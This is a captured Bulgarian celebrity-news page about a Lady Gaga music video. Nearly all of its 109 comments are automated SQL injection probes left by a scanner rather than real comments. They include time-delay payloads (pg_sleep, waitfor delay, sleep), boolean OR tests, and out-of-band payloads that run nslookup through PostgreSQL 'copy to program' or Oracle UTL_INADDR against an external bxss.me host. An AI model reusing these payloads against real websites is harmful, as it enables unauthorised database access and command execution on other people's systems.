Няколко седмици след тийзъра, ето го и видеото към песен. Напомняме ти, че режисьор за първи път е само и единствено Гага, така че, не бъди прекалено критичен.

Още за Лейди Гага.

109 Коментара

 1. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 2. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 3. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 4. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 5. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 6. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 7. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 8. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 9. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 10. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 11. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 12. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 13. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 14. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 15. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 16. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 17. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 18. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 19. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 20. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 21. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 22. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 23. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 24. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 25. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 26. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 27. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 28. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 29. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 30. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 31. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 32. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 33. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 34. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 35. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  858'

 36. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1';copy (select '') to program 'nslookup dns.sqli.\013405.299-3032.299.034bc.\1.bxss.me

 37. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1;copy (select '') to program 'nslookup dns.sqli.\013405.299-3030.299.034bc.\1.bxss.me'

 38. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  '||UTL_INADDR.get_host_address('dns.'||'sqli.013405.299-3028.299.034bc.1.bxss'||'.me')||'

 39. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1||UTL_INADDR.get_host_address('dns.'||'sqli.013405.299-3025.299.034bc.1.bxss'||'.me')

 40. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  ''||(select 1 from (select pg_sleep(30))x)||''

 41. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  '||(select 1 from (select pg_sleep(30))x)||'

 42. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  6H1XUWxd'));select pg_sleep(30); --

 43. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  WLXFiD1R');select pg_sleep(30); --

 44. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  GPMP7JJC';select pg_sleep(20); --

 45. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1));select pg_sleep(20); --

 46. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1);select pg_sleep(20); --

 47. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1;select pg_sleep(10); --

 48. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  Y2Wbs3Xq'; waitfor delay '0:0:10' --

 49. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1 waitfor delay '0:0:10' --

 50. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1); waitfor delay '0:0:30' --

 51. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1; waitfor delay '0:0:30' --

 52. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  (select(0)from(select(sleep(20)))v)/*'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"*/

 53. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  if(now()=sysdate(),sleep(20),0)/*'XOR(if(now()=sysdate(),sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(20),0))OR"*/

 54. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1" OR 3*2>(0+5+260-260) --

 55. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1" OR 3*2<(0+5+260-260) --

 56. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1" OR 3+260-260-1=0+0+0+1 --

 57. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1" OR 2+260-260-1=0+0+0+1 --

 58. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3*2>(0+5+340-340) or '9cxi7MyJ'='

 59. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3*2<(0+5+340-340) or '9cxi7MyJ'='

 60. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3+340-340-1=0+0+0+1 or '9cxi7MyJ'='

 61. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 2+340-340-1=0+0+0+1 or '9cxi7MyJ'='

 62. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3*2>(0+5+921-921) --

 63. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3*2<(0+5+921-921) --

 64. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 3+921-921-1=0+0+0+1 --

 65. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1' OR 2+921-921-1=0+0+0+1 --

 66. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3*2>(0+5+634-634)

 67. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3*2<(0+5+634-634)

 68. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3+634-634-1=0+0+0+1

 69. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 2+634-634-1=0+0+0+1

 70. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3*2>(0+5+566-566) --

 71. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3*2<(0+5+566-566) --

 72. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 3+566-566-1=0+0+0+1 --

 73. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  -1 OR 2+566-566-1=0+0+0+1 --

 74. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 75. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 76. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 283'

  1

 77. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua';copy (select '') to program 'nslookup dns.sqli.\013405.299-2672.299.034bc.\1.bxss.me

  1

 78. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 '||UTL_INADDR.get_host_address('dns.'||'sqli.013405.299-2671.299.034bc.1.bxss'||'.me')||'

  1

 79. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 ''||(select 1 from (select pg_sleep(30))x)||''

  1

 80. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 '||(select 1 from (select pg_sleep(20))x)||'

  1

 81. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 nqT09zt5'));select pg_sleep(20); --

  1

 82. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 Yb5ZgY6C');select pg_sleep(10); --

  1

 83. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 VbqDEC69';select pg_sleep(30); --

  1

 84. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 hNBcpGPI'; waitfor delay '0:0:30' --

  1

 85. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 1 waitfor delay '0:0:30' --

  1

 86. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 (select(0)from(select(sleep(30)))v)/*'+(select(0)from(select(sleep(30)))v)+'"+(select(0)from(select(sleep(30)))v)+"*/

  1

 87. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 if(now()=sysdate(),sleep(30),0)/*'XOR(if(now()=sysdate(),sleep(30),0))OR'"XOR(if(now()=sysdate(),sleep(30),0))OR"*/

  1

 88. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1" OR 3*2>(0+5+257-257) --

  1

 89. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1" OR 3*2<(0+5+257-257) --

  1

 90. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1" OR 3+257-257-1=0+0+0+1 --

  1

 91. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1" OR 2+257-257-1=0+0+0+1 --

  1

 92. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3*2>(0+5+14-14) or 'LtTmoIDy'='

  1

 93. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3*2<(0+5+14-14) or 'LtTmoIDy'='

  1

 94. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3+14-14-1=0+0+0+1 or 'LtTmoIDy'='

  1

 95. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 2+14-14-1=0+0+0+1 or 'LtTmoIDy'='

  1

 96. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3*2>(0+5+819-819) --

  1

 97. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3*2<(0+5+819-819) --

  1

 98. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 3+819-819-1=0+0+0+1 --

  1

 99. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1' OR 2+819-819-1=0+0+0+1 --

  1

 100. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3*2>(0+5+705-705)

  1

 101. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3*2<(0+5+705-705)

  1

 102. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3+705-705-1=0+0+0+1

  1

 103. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 2+705-705-1=0+0+0+1

  1

 104. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3*2>(0+5+690-690) --

  1

 105. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3*2<(0+5+690-690) --

  1

 106. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 3+690-690-1=0+0+0+1 --

  1

 107. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 -1 OR 2+690-690-1=0+0+0+1 --

  1

 108. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

 109. Small b366fdccf2599037dbedf5a34492505e57f66bd609965403d0ca905f0fca29f0 eymbncua

  1

Tози сайт използва "Бисквитки". Научи повече Приемам

Моля, запознайте се с нашите Общи условия и Политика за поверителност